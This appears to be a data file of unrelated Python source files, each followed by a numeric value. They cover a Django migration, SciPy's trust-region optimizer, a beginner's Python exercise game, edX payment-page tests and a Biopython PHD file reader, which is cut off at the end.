= True hass.async_run_job(action, { 'trigger': { 'platform': 'template', 'entity_id': entity_id, 'from_state': from_s, 'to_state': to_s, }, }) elif not template_result: already_triggered = False return async_track_state_change(hass, value_template.extract_entities(), state_changed_listener)
0
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2018-04-05 21:26 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('portal', '0019_auto_20171214_1538'), ] operations = [ # migrations.AddField( # model_name='ensemblassembly', # name='division', # field=models.CharField(db_index=True, max_length=20, null=True), # ), # migrations.AddField( # model_name='ensemblassembly', # name='ensembl_url', # field=models.CharField(db_index=True, max_length=100, null=True), # ), # migrations.AlterField( # model_name='ensemblassembly', # name='common_name', # field=models.CharField(db_index=True, max_length=255, null=True), # ), migrations.AddField( model_name='ensemblassembly', name='example_chromosome', field=models.CharField(max_length=20, null=True), ), migrations.AddField( model_name='ensemblassembly', name='example_end', field=models.IntegerField(null=True), ), migrations.AddField( model_name='ensemblassembly', name='example_start', field=models.IntegerField(null=True), ), ]
0
"""Trust-region optimization.""" from __future__ import division, print_function, absolute_import import math import numpy as np import scipy.linalg from .optimize import (_check_unknown_options, wrap_function, _status_message, OptimizeResult) __all__ = [] class BaseQuadraticSubproblem(object): """ Base/abstract class defining the quadratic model for trust-region minimization. Child classes must implement the ``solve`` method. Values of the objective function, jacobian and hessian (if provided) at the current iterate ``x`` are evaluated on demand and then stored as attributes ``fun``, ``jac``, ``hess``. """ def __init__(self, x, fun, jac, hess=None, hessp=None): self._x = x self._f = None self._g = None self._h = None self._g_mag = None self._cauchy_point = None self._newton_point = None self._fun = fun self._jac = jac self._hess = hess self._hessp = hessp def __call__(self, p): return self.fun + np.dot(self.jac, p) + 0.5 * np.dot(p, self.hessp(p)) @property def fun(self): """Value of objective function at current iteration.""" if self._f is None: self._f = self._fun(self._x) return self._f @property def jac(self): """Value of jacobian of objective function at current iteration.""" if self._g is None: self._g = self._jac(self._x) return self._g @property def hess(self): """Value of hessian of objective function at current iteration.""" if self._h is None: self._h = self._hess(self._x) return self._h def hessp(self, p): if self._hessp is not None: return self._hessp(self._x, p) else: return np.dot(self.hess, p) @property def jac_mag(self): """Magniture of jacobian of objective function at current iteration.""" if self._g_mag is None: self._g_mag = scipy.linalg.norm(self.jac) return self._g_mag def get_boundaries_intersections(self, z, d, trust_radius): """ Solve the scalar quadratic equation ||z + t d|| == trust_radius. This is like a line-sphere intersection. Return the two values of t, sorted from low to high. """ a = np.dot(d, d) b = 2 * np.dot(z, d) c = np.dot(z, z) - trust_radius**2 sqrt_discriminant = math.sqrt(b*b - 4*a*c) # The following calculation is mathematically # equivalent to: # ta = (-b - sqrt_discriminant) / (2*a) # tb = (-b + sqrt_discriminant) / (2*a) # but produce smaller round off errors. # Look at Matrix Computation p.97 # for a better justification. aux = b + math.copysign(sqrt_discriminant, b) ta = -aux / (2*a) tb = -2*c / aux return sorted([ta, tb]) def solve(self, trust_radius): raise NotImplementedError('The solve method should be implemented by ' 'the child class') def _minimize_trust_region(fun, x0, args=(), jac=None, hess=None, hessp=None, subproblem=None, initial_trust_radius=1.0, max_trust_radius=1000.0, eta=0.15, gtol=1e-4, maxiter=None, disp=False, return_all=False, callback=None, **unknown_options): """ Minimization of scalar function of one or more variables using a trust-region algorithm. Options for the trust-region algorithm are: initial_trust_radius : float Initial trust radius. max_trust_radius : float Never propose steps that are longer than this value. eta : float Trust region related acceptance stringency for proposed steps. gtol : float Gradient norm must be less than `gtol` before successful termination. maxiter : int Maximum number of iterations to perform. disp : bool If True, print convergence message. This function is called by the `minimize` function. It is not supposed to be called directly. """ _check_unknown_options(unknown_options) if jac is None: raise ValueError('Jacobian is currently required for trust-region ' 'methods') if hess is None and hessp is None: raise ValueError('Either the Hessian or the Hessian-vector product ' 'is currently required for trust-region methods') if subproblem is None: raise ValueError('A subproblem solving strategy is required for ' 'trust-region methods') if not (0 <= eta < 0.25): raise Exception('invalid acceptance stringency') if max_trust_radius <= 0: raise Exception('the max trust radius must be positive') if initial_trust_radius <= 0: raise ValueError('the initial trust radius must be positive') if initial_trust_radius >= max_trust_radius: raise ValueError('the initial trust radius must be less than the ' 'max trust radius') # force the initial guess into a nice format x0 = np.asarray(x0).flatten() # Wrap the functions, for a couple reasons. # This tracks how many times they have been called # and it automatically passes the args. nfun, fun = wrap_function(fun, args) njac, jac = wrap_function(jac, args) nhess, hess = wrap_function(hess, args) nhessp, hessp = wrap_function(hessp, args) # limit the number of iterations if maxiter is None: maxiter = len(x0)*200 # init the search status warnflag = 0 # initialize the search trust_radius = initial_trust_radius x = x0 if return_all: allvecs = [x] m = subproblem(x, fun, jac, hess, hessp) k = 0 # search for the function min while True: # Solve the sub-problem. # This gives us the proposed step relative to the current position # and it tells us whether the proposed step # has reached the trust region boundary or not. try: p, hits_boundary = m.solve(trust_radius) except np.linalg.linalg.LinAlgError as e: warnflag = 3 break # calculate the predicted value at the proposed point predicted_value = m(p) # define the local approximation at the proposed point x_proposed = x + p m_proposed = subproblem(x_proposed, fun, jac, hess, hessp) # evaluate the ratio defined in equation (4.4) actual_reduction = m.fun - m_proposed.fun predicted_reduction = m.fun - predicted_value if predicted_reduction <= 0: warnflag = 2 break rho = actual_reduction / predicted_reduction # update the trust radius according to the actual/predicted ratio if rho < 0.25: trust_radius *= 0.25 elif rho > 0.75 and hits_boundary: trust_radius = min(2*trust_radius, max_trust_radius) # if the ratio is high enough then accept the proposed step if rho > eta: x = x_proposed m = m_proposed # append the best guess, call back, increment the iteration count if return_all: allvecs.append(x) if callback is not None: callback(x) k += 1 # check if the gradient is small enough to stop if m.jac_mag < gtol: warnflag = 0 break # check if we have looked at enough iterations if k >= maxiter: warnflag = 1 break # print some stuff if requested status_messages = ( _status_message['success'], _status_message['maxiter'], 'A bad approximation caused failure to predict improvement.', 'A linalg error occurred, such as a non-psd Hessian.', ) if disp: if warnflag == 0: print(status_messages[warnflag]) else: print('Warning: ' + status_messages[warnflag]) print(" Current function value: %f" % m.fun) print(" Iterations: %d" % k) print(" Function evaluations: %d" % nfun[0]) print(" Gradient evaluations: %d" % njac[0]) print(" Hessian evaluations: %d" % nhess[0]) result = OptimizeResult(x=x, success=(warnflag == 0), status=warnflag, fun=m.fun, jac=m.jac, nfev=nfun[0], njev=njac[0], nhev=nhess[0], nit=k, message=status_messages[warnflag]) if hess is not None: result['hess'] = m.hess if return_all: result['allvecs'] = allvecs return result
0
''' bombs.py ''' from items import Item import Items import objects import libtcodpy as libtcod ''' ==================== Bombs ==================== ''' class Bomb(Item): identified = False def __init__(self, game, x, y, char, name, color, level, timer, blocks=False, properNoun = False): Item.__init__(self, game, x, y, char, name, color, level, blocks) self.resetTimer = timer self.timer = timer self.armed = False self.actor = None def use(self,actor): self.dropFromInventory(actor) def dropFromInventory(self,actor): self.timer = self.resetTimer self.armed = True self.actor = actor Item.dropFromInventory(self,actor) actor.game.message(actor.getName(True).title()+" dropped a "+self.getName(False)) def tick(self): if self.armed == True: if self.timer == 0: self.effect() return self.timer -= 1 def effect(self): print self.actor if self.actor != None: self.identify(self.actor) self.destroy() def destroy(self): self.game._currentLevel.removeItem(self) self.game._currentLevel.removeObject(self) self.game.removeObject(self) class Grenade(Bomb): def effect(self): physicalDam =8 + (4*self.level) armorPenetration = int(self.level*1.5) fireDam = self.level damage = [physicalDam,armorPenetration,fireDam,0,0,0,0,0,0] volume = self.volume = 15 + 3*self.level objects.Explosion(self.game, self.x, self.y, libtcod.yellow, damage, volume) print 'explosion' self.identify(self.actor) self.destroy() class GasGrenade(Bomb): pass class Smokebomb(Bomb): def effect(self): volume = 15 + 2*self.level objects.SmokeCloud(self.game, self.x, self.y, 'smoke', libtcod.dark_grey, volume) self.identify(self.actor) self.destroy() class FlachetteGrenade(Bomb): pass # Does physical damage and bleed damage class FlashGrenade(Bomb): pass # confuses any actor withing its effective range class Spellbomb(Bomb): def __init__(self, game, x, y, char, name, color, level, timer, blocks=False, properNoun = False): Bomb.__init__(self, game, x, y, char, name, color, level, timer) self.spell = Items.spells.Spell(self.game,self.name,self) self.spell.magicCost = 0 def effect(self): # Note: this implementation only works if the spell requires no target self.spell.cast() self.identify(self.actor) self.destroy()
0.039689
"""django_blank URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.9/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from base import views urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^$', views.index, name='index'), url(r'^graph$', views.graph_data, name='graph'), url(r'^months$', views.available_months, name='months'), url(r'^days$', views.available_days, name='days'), url(r'^hours$', views.available_hours, name='hours'), url(r'^weatherlyzer.js$', views.weatherlyzer_js, name='weatherlyzer_js'), ]
0
#!/usr/bin/env python from __future__ import print_function import os, shutil, sys from optparse import OptionParser def findPackages(root,ignores): packages = set() for (dir, dirs, filenames) in os.walk(root): for filename in filter(lambda x: x == 'top_level.txt', filenames): path = os.path.join(dir, filename) with open(path) as f: for package in f: package = package.strip() for name in (package, package + '.py'): if os.path.exists(os.path.join(root, name)): if name in ignores: print('Ignore {} in {}.'.format(name, path)) else: print('Found {} in {}.'.format(name, path)) packages.add(name) return packages def ignorePackages(file): packages = [] if file is None: return packages with open(file) as f: for package in f: packages.append(package.strip().split(' ')[0]) return packages def dropSubpackages(packages): ''' Quick and dirty way to drop subpackages and only link their parent packages/directories. ''' copy = set(packages) for package in packages: drop = set() for p in copy: if (p != package) and (p.startswith(package + '/') or p.startswith(package + '\\')): print('Dropping subpackage {} in favor of {}.'.format(p, package)) drop.add(p) copy.difference_update(drop) return copy def link(sourceDir, targetDir, name, copy): source = os.path.join(sourceDir, name) target = os.path.join(targetDir, name) # Redefine targetDir to include any subdir paths that may have been present in target. targetDir = os.path.dirname(target) if os.path.exists(target): print('[!] Skipping {} (target already exists).'.format(target)) else: if not os.path.exists(targetDir): print('[!] Creating parent directory {}'.format(targetDir)) os.makedirs(targetDir) if copy: print('{} -> {}'.format(target, source)) (shutil.copytree if os.path.isdir(source) else shutil.copyfile)(source, target) else: relSource = os.path.relpath(source, targetDir) print('{} -> {}'.format(target, relSource)) os.symlink(relSource, target) def main(argv = sys.argv): parser = OptionParser( usage='usage: %prog [options] [path/to/site-packages/] path/to/target/dir', description='Will look for packages in your `site-packages\' ' + 'directory and symlink (or copy if the --copy flag is ' + 'present) them to the target directory. The ' + '`site-packages\' directory will be auto-discovered ' + 'if not provided.' ) parser.add_option('-c', '--copy', dest='copy', action='store_true', default=False, help='Copy packages instead of symlinking' ) parser.add_option('-i', '--ignore-file', dest='ignorefile', action='store', metavar='FILE', help='FILE that lists packages to ignore' ) (options, args) = parser.parse_args() copy = options.copy ignorefile = options.ignorefile if len(args) == 1: packageDirs = [ p for p in sys.path if p.startswith(os.environ['VIRTUAL_ENV']) and p.endswith('site-packages') ] if len(packageDirs) != 1: parser.error('ambiguous source directories, must specify explicitly') return sitePackages = packageDirs[0] elif len(args) == 2: sitePackages = args[0] else: parser.error('source and target directories must be specified') return target = args[-1] if not os.path.exists(sitePackages): print('Error: source directory `{}\' does not exist!'.format(sitePackages)) return packages = findPackages(sitePackages, ignorePackages(ignorefile)) packages = dropSubpackages(packages) print('{} packages: {}'.format('Copying' if copy else 'Linking', ', '.join(packages))) for package in packages: link(sitePackages, target, package, copy) statement = \ 'import os, sys\n' + \ 'sys.path.insert(0, os.path.join(os.path.dirname(__file__), \'{}\'))'.format(target.strip('/\\')) print('\nAdd the following to your appengine_config.py:\n') print(statement, '\n\n') if __name__ == '__main__': main()
0.031211
# -*- coding: utf-8 -*- """ *************************************************************************** general.py --------------------- Date : April 2013 Copyright : (C) 2013 by Victor Olaya Email : volayaf at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Victor Olaya' __date__ = 'April 2013' __copyright__ = '(C) 2013, Victor Olaya' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' from processing.core.Processing import Processing from processing.gui.Postprocessing import handleAlgorithmResults from processing.core.parameters import ParameterSelection def alglist(text=None): s = '' for provider in Processing.algs.values(): sortedlist = sorted(provider.values(), key=lambda alg: alg.name) for alg in sortedlist: if text is None or text.lower() in alg.name.lower(): s += alg.name.ljust(50, '-') + '--->' + alg.commandLineName() \ + '\n' print s def algoptions(name): alg = Processing.getAlgorithm(name) if alg is not None: s = '' for param in alg.parameters: if isinstance(param, ParameterSelection): s += param.name + '(' + param.description + ')\n' i = 0 for option in param.options: s += '\t' + str(i) + ' - ' + str(option) + '\n' i += 1 print s else: print 'Algorithm not found' def alghelp(name): alg = Processing.getAlgorithm(name) if alg is not None: alg = alg.getCopy() print str(alg) algoptions(name) else: print 'Algorithm not found' def runalg(algOrName, *args): alg = Processing.runAlgorithm(algOrName, None, *args) if alg is not None: return alg.getOutputValuesAsDictionary() def runandload(name, *args): return Processing.runAlgorithm(name, handleAlgorithmResults, *args)
0
#!/usr/bin/env python3 from PIL import Image from utils import lerp import sys if __name__ == "__main__": width = 320 height = 256 A = 128 B = 64 pal = [] for i in range(2): pal.extend([0, 0, 0]) for i in range(6): c = int(lerp(0, 15, float(i) / 5)) c = (c << 4) | c pal.extend([0, c, c]) for i in range(6): c = int(lerp(15, 0, float(i) / 5)) c = (c << 4) | c pal.extend([0, c, c]) for i in range(2): pal.extend([0, 0, 0]) im = Image.new('L', (width, height)) im.putpalette(pal) pix = im.load() for i in range(-B, B): for j in range(height): pix[i + width / 2, j] = j % 15 + 1 W = width // 2 - B minY = 0 maxY = height for i in range(W): y0 = float(i * A) / W - A y1 = (height - 1) - y0 dy = y1 - y0 v0 = (minY - y0) * 256 / dy v1 = maxY + (maxY - y1) * 256 / dy for j in range(height): v = int(lerp(v0, v1, float(j) / 255)) pix[i, j] = v % 15 + 1 pix[width - i - 1, j] = v % 15 + 1 im.save(sys.argv[1], "PNG")
0
#!/usr/bin/env python #/////////////////////////////////////////////////////////////// def levelCodeOrFail(lc=True): if lc: print '''Please enter the level code as first argument!''' else: print '''Sorry this is not correct, please try again.''' #/////////////////////////////////////////////////////////////// def level0(level_code=''): if not level_code: print ''' To complete this exercise you need to call this function with the level code: 8Xsu33Hn Here is an example: In [1]: level0('levelcode') ''' elif level_code=='8Xsu33Hn': print ''' Hoooray you made it! You can go to the next level. The level code is: 9fCkmGsy You will reach the next level by calling level1('9fCkmGsy') ''' else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #float def level1(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='9fCkmGsy': if not input: print ''' To complete this exercise insert the number 4 as a float. Here is an example: In [1]: level1('levelcode',5.1) ''' elif isinstance(input, float) and input==4.0: print ''' Good! You can write either 4.0 or float(4) to make 4 a float. The next level code is: YXHIY9AF call level2('YXHIY9AF') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #string def level2(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='YXHIY9AF': if not input: print ''' To complete this exercise insert the string: I like 2 go 2 the next level Hint: - if you put your string into a variable, you can reuse it in the next level. here is an example: In [1]: level2('levelcode','answer string') ''' elif input=='I like 2 go 2 the next level': print ''' You made it! The next level code is: L34XSOq9 call level3('L34XSOq9') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #list (str.split()) def level3(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='L34XSOq9': if not input: print ''' To complete this exercise insert the string from level 2 as a list of words here is an example: In [1]: level3('levelcode',['answer', 'string']) ''' elif input==['I', 'like', '2', 'go', '2', 'the', 'next', 'level']: print ''' Right on! The intended way to do it was: my_string.split() The next level code is: XahS6y6l call level4('XahS6y6l') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #list[index] def level4(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='XahS6y6l': if not input: print ''' To complete this exercise insert only the 3rd element of the list of words from level 3 Hints: - you can access list elements with list[index] - list start with the index 0 ''' elif input=='2': print ''' Congratulations! The next level code is: acjYW08p level5('acjYW08p') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #splicing def level5(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='acjYW08p': if not input: print ''' To complete this exercise insert the string from level 2 as an array of words. This time insert only the first two elements and the last two elements as one list. Hints: - you can extract sub lists by with list[begin:end] - you can concatenate lists with the + sign ''' elif input==['I', 'like', 'next', 'level']: print ''' Phantastic! / ,._/ (((6\ _,---) )r` ( ( )__)) ) /// \\\\\ \\\\\\ |\\\ ''' ''' The next level code is: B861yGOX level6('B861yGOX') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #Dict def level6(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='B861yGOX': if not input: print ''' To complete this exercise put the following codon codes into a dictionary | Codon | AS | |============| | GCA | A | | AGU | S | | UGG | W | ''' elif input=={'GCA':'A', 'AGU':'S', 'UGG':'W'}: print """ Cowabonga! Fast and easy: my_dict = {'GCA':'A', 'AGU':'S', 'UGG':'W'} The next level code is: S8MvpTKz level7('S8MvpTKz') """ else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #add element to dict def level7(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='S8MvpTKz': if not input: print ''' To complete this execise add the Stop-Codon 'UGA' ('UGA': 'Stop') to your dictionary. ''' elif input=={'GCA':'A', 'AGU':'S', 'UGG':'W', 'UGA':'Stop'}: print ''' All right! It is easy to add or change an element of your dictionary: my_dict['UGA'] = 'Stop' With my_dict.update({'UGA':'Stop'}) you can add or/and change multiple elements at once. The next level code is: tRT72s8m level8('tRT72s8m') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #dict.keys def level8(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='tRT72s8m': if not input: print ''' To complete this exercise insert the keys of the dictionary from level 7 as a list. Hint: - In Ipython you will find methods for dictionaries by tabbing. ''' elif input==['GCA', 'AGU', 'UGG', 'UGA']: print ''' Hoooray! Yes! my_dict.keys() gave you a list of the keys, while my_dict.values() would give you a list of the values (here: ['A', 'S', 'W', 'Stop']). The next level code is: e82OApRu level9('e82OApRu') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #dict.items def level9(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='e82OApRu': if not input: print ''' To complete this exercise produce a list of (key, value) pairs and insert it into the function. ''' elif input==[('GCA', 'A'), ('AGU', 'S'), ('UGG', 'W'), ('UGA', 'Stop')]: print ''' Well done! my_dict.items() produces a list of (key, value) pairs as 2-tuples. ."`". .-./ _=_ \.-. { (,(oYo),) }} {{ | " |} } { { \(---)/ }} {{ }'-=-'{ } } { { }._:_.{ }} {{ } -:- { } } {_{ }`===`{ _} ((((\) (/)))) The next level code is: Ju22w99B level10('Ju22w99B') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #range def level10(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='Ju22w99B': if not input: print ''' To complete this exercise insert a list of integers from 0 to 941 into this function here is an example: In [1]: level10('levelcode',[1,2,3]) ''' elif input==range(942): print ''' Super! I'm sure you used range(942) instead of typing the whole thing. The next level code is: jDU0R8Jz level11('jDU0R8Jz') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #sum def level11(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='jDU0R8Jz': if not input: print ''' To complete this exercise insert the sum of the integers from 0 to 941 into this function Hint: - You can use a loop here is an example: In [1]: level11('levelcode',1234) ''' elif input==443211: print ''' Ace! In [1]: my_sum = 0 In [2]: for element in xrange(942): ....: my_sum += element ....: The next level code is: GUa85gw3 level12('GUa85gw3') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level12(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='GUa85gw3': if not input: print ''' Do you find a list method to make the exercise from level 11 shorter and avoid the loop? Hint: - You can use the sum() function for many python objects. ''' elif input==443211: print ''' Almost done! In [1]: sum(xrange(942)) The next level code is: fu73LcBA level13('fu73LcBA') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level13(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='fu73LcBA': try: if not input: print ''' write a function that returns (not prints!) the string hello world insert your function as argument into this functions In [1]: level13('levelcode',myfunction) ''' elif input()=='hello world': print ''' One more! In [1]: def my_function(): ....: return 'hello world' ....: The next level code is: kK8SFqj5 level14('kK8SFqj5') ''' else: levelCodeOrFail(False) except: print "\nHint: Insert the function not its result!" else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level14(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='kK8SFqj5': try: if not input: print ''' write a function that takes one input argument if the input is 42 the function should return the bool True if the input is any other number larger than zero it should return the bool False if the input is a number smaller or equal to zero it should not return anything insert your function as argument ''' elif input(42) and not input(23) and input(0)==None and input(-34)==None: print ''' You made it all through!! In [1]: def my_2nd_function(my_input): ....: if my_input == 42: ....: return True ....: elif my_input > 0: ....: return False ....: Here is your typing rhino! , , /| |\./'. | | , \|| ,| \ \_(\.-""\//. _ .-'`""``"` _ ` `-.`"""--.._ _..----. __ | '~` o\ `"---" `. `"-.==, \,.-; `"` |`""`===` (` / | .-------. `-----.____.; \ | ; _|~~ ~~ |_ \__ | \ / =(_|_______|_)= .' .' \ ' `, |:::::::::| / / '._ | |:::::::[]| | '.---;`-.____.-'`\ `""`; | |o=======.| | _\ \ '. ) / \ `"""""""""` \-,--( / / _/ .' |_ _ .-) '----;)__; (`.-. ; `-:.;-' `""""` ''' else: levelCodeOrFail(False) except: print "\n:( this can't be right" else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #/////////////////////////////////////////////////////////////// #if __name__=="__main__": print ''' This module contains excercises in the form of functions. The functions always expect a level code as input argument. If you solved the exercise the function will return the level code of the next level. start with level 0 by calling the function level0 level0() '''
0.028961
# -*- coding: utf-8 -*- # # This file is part of INSPIRE. # Copyright (C) 2014-2017 CERN. # # INSPIRE is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # INSPIRE is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with INSPIRE. If not, see <http://www.gnu.org/licenses/>. # # In applying this license, CERN does not waive the privileges and immunities # granted to it by virtue of its status as an Intergovernmental Organization # or submit itself to any jurisdiction. """Approval action for INSPIRE arXiv harvesting.""" from __future__ import absolute_import, division, print_function from invenio_db import db class AuthorApproval(object): """Class representing the author approval action.""" name = "Approve author" @staticmethod def resolve(obj, *args, **kwargs): """Resolve the action taken in the approval action.""" request_data = kwargs.get("request_data", {}) value = request_data.get("value", "") approved = value in ('accept', 'accept_curate') ticket = value == 'accept_curate' obj.extra_data["approved"] = approved obj.extra_data["ticket"] = ticket obj.extra_data["user_action"] = value obj.save() db.session.commit() obj.continue_workflow(delayed=True)
0
""" Tests for the fake payment page used in acceptance tests. """ from django.test import TestCase from shoppingcart.processors.CyberSource2 import sign, verify_signatures from shoppingcart.processors.exceptions import CCProcessorSignatureException from shoppingcart.tests.payment_fake import PaymentFakeView from collections import OrderedDict class PaymentFakeViewTest(TestCase): """ Test that the fake payment view interacts correctly with the shopping cart. """ def setUp(self): super(PaymentFakeViewTest, self).setUp() # Reset the view state PaymentFakeView.PAYMENT_STATUS_RESPONSE = "success" self.client_post_params = OrderedDict([ ('amount', '25.00'), ('currency', 'usd'), ('transaction_type', 'sale'), ('orderNumber', '33'), ('access_key', '123456789'), ('merchantID', 'edx'), ('djch', '012345678912'), ('orderPage_version', 2), ('orderPage_serialNumber', '1234567890'), ('profile_id', "00000001"), ('reference_number', 10), ('locale', 'en'), ('signed_date_time', '2014-08-18T13:59:31Z'), ]) def test_accepts_client_signatures(self): # Generate shoppingcart signatures post_params = sign(self.client_post_params) # Simulate a POST request from the payment workflow # page to the fake payment page. resp = self.client.post( '/shoppingcart/payment_fake', dict(post_params) ) # Expect that the response was successful self.assertEqual(resp.status_code, 200) # Expect that we were served the payment page # (not the error page) self.assertIn("Payment Form", resp.content) def test_rejects_invalid_signature(self): # Generate shoppingcart signatures post_params = sign(self.client_post_params) # Tamper with the signature post_params['signature'] = "invalid" # Simulate a POST request from the payment workflow # page to the fake payment page. resp = self.client.post( '/shoppingcart/payment_fake', dict(post_params) ) # Expect that we got an error self.assertIn("Error", resp.content) def test_sends_valid_signature(self): # Generate shoppingcart signatures post_params = sign(self.client_post_params) # Get the POST params that the view would send back to us resp_params = PaymentFakeView.response_post_params(post_params) # Check that the client accepts these try: verify_signatures(resp_params) except CCProcessorSignatureException: self.fail("Client rejected signatures.") def test_set_payment_status(self): # Generate shoppingcart signatures post_params = sign(self.client_post_params) # Configure the view to declined payments resp = self.client.put( '/shoppingcart/payment_fake', data="decline", content_type='text/plain' ) self.assertEqual(resp.status_code, 200) # Check that the decision is "DECLINE" resp_params = PaymentFakeView.response_post_params(post_params) self.assertEqual(resp_params.get('decision'), 'DECLINE') # Configure the view to fail payments resp = self.client.put( '/shoppingcart/payment_fake', data="failure", content_type='text/plain' ) self.assertEqual(resp.status_code, 200) # Check that the decision is "REJECT" resp_params = PaymentFakeView.response_post_params(post_params) self.assertEqual(resp_params.get('decision'), 'REJECT') # Configure the view to accept payments resp = self.client.put( '/shoppingcart/payment_fake', data="success", content_type='text/plain' ) self.assertEqual(resp.status_code, 200) # Check that the decision is "ACCEPT" resp_params = PaymentFakeView.response_post_params(post_params) self.assertEqual(resp_params.get('decision'), 'ACCEPT')
0
# Copyright 2008-2010 by Peter Cock. All rights reserved. # Revisions copyright 2009 by Cymon J. Cox. All rights reserved. # # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. """Bio.SeqIO support for the "phd" file format. PHD files are output by PHRED and used by PHRAP and CONSED. You are expected to use this module via the Bio.SeqIO functions, under the format name "phd". See also the underlying Bio.Sequencing.Phd module. For example, using Bio.SeqIO we can read in one of the example PHRED files from the Biopython unit tests: >>> from Bio import SeqIO >>> for record in SeqIO.parse("Phd/phd1", "phd"): ... print(record.id) ... print("%s..." % record.seq[:10]) ... print("%s..." % record.letter_annotations["phred_quality"][:10]) 34_222_(80-A03-19).b.ab1 ctccgtcgga... [9, 9, 10, 19, 22, 37, 28, 28, 24, 22]... 425_103_(81-A03-19).g.ab1 cgggatccca... [14, 17, 22, 10, 10, 10, 15, 8, 8, 9]... 425_7_(71-A03-19).b.ab1 acataaatca... [10, 10, 10, 10, 8, 8, 6, 6, 6, 6]... Since PHRED files contain quality scores, you can save them as FASTQ or as QUAL files, for example using Bio.SeqIO.write(...), or simply with the format method of the SeqRecord object: >>> print(record[:50].format("fastq")) @425_7_(71-A03-19).b.ab1 acataaatcaaattactnaccaacacacaaaccngtctcgcgtagtggag + ++++))'''')(''')$!$''')''''(+.''$!$))))+)))''''''' <BLANKLINE> Or, >>> print(record[:50].format("qual")) >425_7_(71-A03-19).b.ab1 10 10 10 10 8 8 6 6 6 6 8 7 6 6 6 8 3 0 3 6 6 6 8 6 6 6 6 7 10 13 6 6 3 0 3 8 8 8 8 10 8 8 8 6 6 6 6 6 6 6 <BLANKLINE> Note these examples only show the first 50 bases to keep the output short. """ from __future__ import print_function from Bio.SeqRecord import SeqRecord from Bio.Sequencing import Phd from Bio.SeqIO.Interfaces import SequentialSequenceWriter from Bio.SeqIO import QualityIO __docformat__ = "restructuredtext en" def PhdIterator(handle): """Returns SeqRecord objects from a PHD file. This uses the Bio.Sequencing.Phd module to do the hard work. """ phd_records = Phd.parse(handle) for phd_record in phd_records: # Convert the PHY record into a SeqRecord... # The "filename" can contain spaces, e.g. 'HWI-EAS94_4_1_1_602_99 1' # from unit test example file phd_solexa. # This will cause problems if used as the record identifier # (e.g. output for FASTQ format). name = phd_record.file_name.split(None, 1)[0] seq_record = SeqRecord(phd_record.seq, id=name, name=name, description=phd_record.file_name) # Just re-use the comments dictionary as the SeqRecord's annotations seq_record.annotations = phd_record.comments # And store the qualities and peak locations as per-letter-annotation seq_record.letter_annotations["phred_quality"] = \ [int(site[1]) for site in phd_record.sites] try: seq_record.letter_annotations["peak_location"] = \ [int(site[2]) for site in phd_record.sites] except IndexError: # peak locations are not always there according to # David Gordon (the Consed author) pass yield seq_record # All done class PhdWriter(SequentialSequenceWriter): """Class to write Phd format files""" def __init__(self, handle): SequentialSequenceWriter.__init__(self, handle) def write_record(self, record): """Write a single Phd record to the file.""" assert record.seq, "No sequence present in SeqRecord" # This method returns the 'phred_quality' scores or converted # 'solexa_quality' scores if present, else raises a value error phred_qualities = QualityIO._get_phred_quality(record) peak_locations = record.letter_annotations.get("peak_location", None) assert len(record.seq) == len(phred_qualities), "Number of " + \ "phd quality scores does not match length of sequence" if peak_locations: assert len(record.seq) == 